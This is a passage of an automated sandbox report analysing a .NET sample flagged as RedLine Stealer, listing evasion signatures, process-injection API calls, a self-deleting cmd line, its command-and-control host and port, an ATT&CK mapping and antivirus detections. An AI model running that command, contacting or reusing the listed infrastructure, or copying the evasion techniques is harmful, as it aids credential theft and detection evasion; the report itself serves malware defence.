Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdby source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: erviceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb\M source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 0__31bf3856ad364e35\System.ServiceModel.Internals.pdb) source: Build.exe, 00000000.00000002.1866156189.000000000646B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.Internals.pdb8 source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.Internals.pdbpdbals.pdbqq source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\dll\System.ServiceModel.Internals.pdb source: Build.exe, 00000000.00000002.1866138722.000000000645A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: Build.exe, 00000000.00000002.1863379517.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Build.exe, LoadExecutor.cs

.Net Code: SelfExecute System.Reflection.Assembly.Load(byte[])

Source: Build.exe

Static PE information: 0xC739A26A [Sun Dec 1 16:25:14 2075 UTC]

Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_00CCF450 push ecx; ret	0_2_00CCF6A2
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_00CCF650 push ecx; ret	0_2_00CCF6A2
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C6E389 pushfd ; retf 0004h	0_2_04C6E38A
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C6AF70 push cs; ret	0_2_04C6AFA4
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C6E868 pushfd ; retf 0004h	0_2_04C6E86A
Source: C:\Users\user\Desktop\Build.exe	Code function: 0_2_04C6E818 pushfd ; retf 0004h	0_2_04C6E81A

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\Build.exe	Process created: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"
Source: C:\Users\user\Desktop\Build.exe	Process created: "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"			Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49731 -> 6677

Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Build.exe	Memory allocated: CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Memory allocated: 2740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Memory allocated: D60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Build.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Build.exe TID: 5968	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe TID: 5576	Thread sleep count: 134 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe TID: 4144	Thread sleep count: 166 > 30	Jump to behavior

Source: C:\Users\user\Desktop\Build.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Build.exe	Binary or memory string: <VirtualMachine>k__BackingField
Source: Build.exe	Binary or memory string: set_VirtualMachine
Source: Build.exe	Binary or memory string: VMwareVMware
Source: Build.exe	Binary or memory string: VMWare
Source: Build.exe	Binary or memory string: get_VirtualMachine
Source: Build.exe	Binary or memory string: VEN_VMWARE
Source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Build.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Build.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Build.exe, LibInvoker.cs	Reference to suspicious API methods: NativeMethods.GetProcAddress(SystemNetMailSmtpNtlmAuthenticationModuleC, MicrosoftWinTimerElapsedEventHandlerKtionName)
Source: Build.exe, LoadExecutor.cs	Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.VirtualAllocExDelegate>("VirtualAllocEx")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, ptr3->OptionalHeader.SizeOfImage, 12288u, 64u)
Source: Build.exe, LoadExecutor.cs	Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.WriteProcessMemoryDelegate>("WriteProcessMemory")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, lSqlDependencyProcessDispatcherSqlConnectionContainerHashHelperU, ptr3->OptionalHeader.SizeOfHeaders, IntPtr.Zero)

Source: C:\Users\user\Desktop\Build.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356

Jump to behavior

Source: C:\Users\user\Desktop\Build.exe	Queries volume information: C:\Users\user\Desktop\Build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Build.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: Build.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: Build.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Build.exe	78%	ReversingLabs	Win32.Trojan.Gaborone
Build.exe	74%	Virustotal		Browse
Build.exe	100%	Avira	HEUR/AGEN.1309950
Build.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
medical-m.gl.at.ply.gg	3%	Virustotal		Browse
15.164.165.52.in-addr.arpa	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	URL Reputation	safe
http://tempuri.org/IRemotePanel/GetSettingsResponse05	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/SendClientInfoResponse05	0%	Avira URL Cloud	safe
http://medical-m.gl.at.ply.gg:6677/IRemotePanel	0%	Avira URL Cloud	safe
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetTasksLR	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/CompleteTaskLR	0%	Avira URL Cloud	safe
https://google.com/	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetSettingsLR	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/CompleteTaskResponse05	0%	Avira URL Cloud	safe
http://medical-m.gl.at.ply.gg	0%	Avira URL Cloud	safe
https://google.com/	2%	Virustotal		Browse
http://medical-m.gl.at.ply.gg:6677	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetSettingsT	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetTasksLR	2%	Virustotal		Browse
http://medical-m.gl.at.ply.gg	3%	Virustotal		Browse
http://tempuri.org/IRemotePanel/SendClientInfoLR	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetTasksResponse05	0%	Avira URL Cloud	safe
http://checkip.amazonaws.com/)https://ipinfo.io/ip	0%	Avira URL Cloud	safe
http://medical-m.gl.at.ply.gg:6677	3%	Virustotal		Browse
http://tempuri.org/0	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/GetSettingsLR	2%	Virustotal		Browse
http://tempuri.org/IRemotePanel/	0%	Avira URL Cloud	safe
http://checkip.amazonaws.com/)https://ipinfo.io/ip	0%	Virustotal		Browse
http://tempuri.org/IRemotePanel/CompleteTaskLR	2%	Virustotal		Browse
http://tempuri.org/IRemotePanel/GetSettingsT	2%	Virustotal		Browse
http://tempuri.org/IRemotePanel/GetSettings	0%	Avira URL Cloud	safe
http://tempuri.org/IRemotePanel/SendClientInfoLR	2%	Virustotal		Browse
http://tempuri.org/IRemotePanel/	1%	Virustotal		Browse
http://medical-m.gl.at.ply.gg:6677/IRemotePanel	3%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	0%	Virustotal		Browse
http://tempuri.org/0	0%	Virustotal		Browse
http://tempuri.org/IRemotePanel/GetSettings	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
medical-m.gl.at.ply.gg	147.185.221.16	true	false	3%, Virustotal, Browse	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://medical-m.gl.at.ply.gg:6677/IRemotePanel	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	Build.exe	false	Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/SendClientInfoResponse05	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/IRemotePanel/GetTasksLR	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/IRemotePanel/GetSettingsResponse05	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/CompleteTaskLR	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://google.com/	Build.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/GetSettingsLR	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/CompleteTaskResponse05	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org	Build.exe	false	URL Reputation: safe	unknown
http://medical-m.gl.at.ply.gg	Build.exe, 00000000.00000002.1864630370.00000000027EF000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://medical-m.gl.at.ply.gg:6677	Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/GetSettingsT	Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/IRemotePanel/SendClientInfoLR	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/GetTasksResponse05	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.amazonaws.com/)https://ipinfo.io/ip	Build.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/0	Build.exe, 00000000.00000002.1864630370.00000000027E8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/IRemotePanel/GetSettings	Build.exe, 00000000.00000002.1864630370.00000000027E4000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Build.exe, 00000000.00000002.1864630370.00000000027D7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	Build.exe, 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.185.221.16	medical-m.gl.at.ply.gg	United States		12087	SALSGIVERUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1464753
Start date and time:	2024-06-30 01:28:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Build.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/0@2/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 175 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Build.exe, PID 6356 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.185.221.16	4JL966sxM4.exe	Get hash	malicious	RedLine	Browse	jul-nelson.gl.at.ply.gg:47198/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	Discord Tools.exe	Get hash	malicious	XWorm	Browse	147.185.221.20
	Wave.exe	Get hash	malicious	XWorm	Browse	147.185.221.19
	Updater.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.19
	Image logger beta.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.20
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	147.185.221.20
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	147.185.221.20
	Shiba Genisis Loader.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	147.185.221.20
	ModStickInjectorV1.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	147.185.221.20
	Loader.exe	Get hash	malicious	Quasar	Browse	147.185.221.20
	SJ5SyRpCFA.elf	Get hash	malicious	Unknown	Browse	147.170.50.246

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.2471647561855255
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Build.exe
File size:	144'384 bytes
MD5:	19e47b9abf123f4502545a5fcb43c855
